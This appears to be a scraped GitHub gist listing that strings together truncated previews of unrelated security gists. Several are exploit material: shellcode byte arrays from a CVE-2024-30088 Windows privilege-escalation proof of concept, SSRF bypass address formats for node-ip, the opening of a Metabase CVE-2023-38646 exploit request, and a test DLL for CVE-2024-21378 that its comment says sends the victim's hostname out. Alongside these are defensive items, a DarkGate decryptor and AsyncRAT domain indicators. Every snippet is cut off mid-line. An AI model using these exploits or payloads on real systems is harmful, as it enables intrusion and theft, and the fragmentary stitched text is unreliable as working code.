This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // CVE-2024-30088 PoC - @carrot_c4k3 (exploits.forsale) | |
| // | |
| let get_token_handle_code = [0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x48,0x48,0xc7,0x44,0x24,0x38,0x0,0x0,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0xff,0x10,0x4c,0x8d,0x44,0x24,0x38,0xba,0x0,0x0,0x0,0x2,0x48,0x8b,0xc8,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x8,0xc7,0x44,0x24,0x30,0x0,0x0,0x0,0x0,0x48,0x8d,0x44,0x24,0x30,0x48,0x89,0x44,0x24,0x20,0x41,0xb9,0x0,0x20,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0x4c,0x8b,0x40,0x18,0xba,0x16,0x0,0x0,0x0,0x48,0x8b,0x4c,0x24,0x38,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x10,0x48,0x8b,0x44,0x24,0x50,0x48,0x8b,0x4c,0x24,0x38,0x48,0x89,0x48,0x40,0x8b,0x44,0x24,0x30,0x48,0x83,0xc4,0x48,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc] | |
| let create_smash_thread_code = [0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x38,0x48,0xc7,0x44,0x24,0x28,0x0,0x0,0x0,0x0,0xc7,0x44,0x24,0x20,0x0,0x0,0x0,0x0,0x4c,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x40,0x4c,0x8b,0x40,0x28,0x33,0xd2,0x33,0xc9,0x48,0x8b,0x44,0x24,0x40,0xff,0x50,0x20,0x48,0x83,0xc4,0x38,0xc3,0xcc |
tin-z
/ VR_roadmap.md
Last active
July 22, 2024 03:05
Becoming a Vulnerability Researcher roadmap: my personal experience
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <assert.h> | |
| #include <Windows.h> | |
| // Some of them were taken (and modified) from https://github.com/winsiderss/systeminformer | |
| typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
| { | |
| BOOLEAN SecureKernelRunning : 1; | |
| BOOLEAN HvciEnabled : 1; |
d0rb
/ gist:765b263c226edc3368e4ae90d440c05d
Created
June 5, 2024 09:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2024-29415 represents a significant security vulnerability in the node-ip package, a popular Node.js library used to retrieve IPv4 addresses. This library, instrumental in many server-side applications, has been identified as containing a serious flaw in its IP address classification function, isPublic(). This flaw can lead to Server-Side Request Forgery (SSRF) attacks when private IP addresses are misclassified as public. | |
| Vulnerability Description | |
| The core issue lies in the isPublic() function, which incorrectly identifies certain IP address formats as public, even when they represent private or reserved addresses. Notable examples of such misclassifications include: | |
| 127.1 | |
| 01200034567 | |
| 012.1.2.3 | |
| 000:0:0000::01 | |
| ::fFFf:127.0.0.1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/ | |
| import argparse | |
| import random | |
| import win32com.client | |
| def insert_digit(word, digit): | |
| pos = random.randint(1, len(word) - 1) | |
| return word[:pos] + digit + word[pos:] | |
| def generate_command(url, file_path): |
Thank you to SpecterOps for supporting this research, to Elad for helping draft this blog, and to Sarah, Daniel, and Adam for proofreading and editing! Crossposted on the SpecterOps Blog.
What follows is the culmination of two years of research with funding by SpecterOps and contributions from many of my coworkers.
Special thanks are needed to Elad, Lee, Will, Daniel, and Kai. Elad, Lee, and Will have contributed several ideas to the project, which are documented here, and have each spent multiple days testing the tool. Daniel has answered all of my inevitable questions about AzureAD (whoops, now Ent
Homer28
/ test_dll.c
Last active
July 13, 2024 01:59
DLL code for testing CVE-2024-21378 in MS Outlook
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |
X-Junior
/ DarkGate_Static_String_Decryption.py
Created
August 3, 2023 13:42
DarkGate Static String Decryption
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys , pefile , validators , re , base64 | |
| ''' | |
| Author: Mohamed Ashraf (@X__Junior) | |
| Usage: | |
| python3 darkgate.py path_to_sample | |
| ''' | |
| def is_ascii(s): | |
| return all(ord(c) < 128 or ord(c) == 0 for c in s) |
testanull
/ cve-2023-38646_poc.txt
Created
July 28, 2023 02:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/setup/validate HTTP/1.1 | |
| Host: localhost:3000 | |
| Content-Length: 416 | |
| Accept: application/json | |
| Content-Type: application/json | |
| User-Agent: Mozilla/5.0 | |
| Connection: close | |
| {"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{ | |
| "subprotocol":"h2", |
kirk-sayre-work
/ gist:f9748c3cae156b56a0751679085b3f8e
Created
July 21, 2023 21:07
AsyncRAT 7/21/2023
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Next Stage Download Domains: | |
| asuxtp.fun | |
| bisiv.top | |
| dubpv.top | |
| eovze.fun | |
| fyzyxe.top | |
| igsufb.top | |
| izrvb.top | |
| lvuse.top |
NewerOlder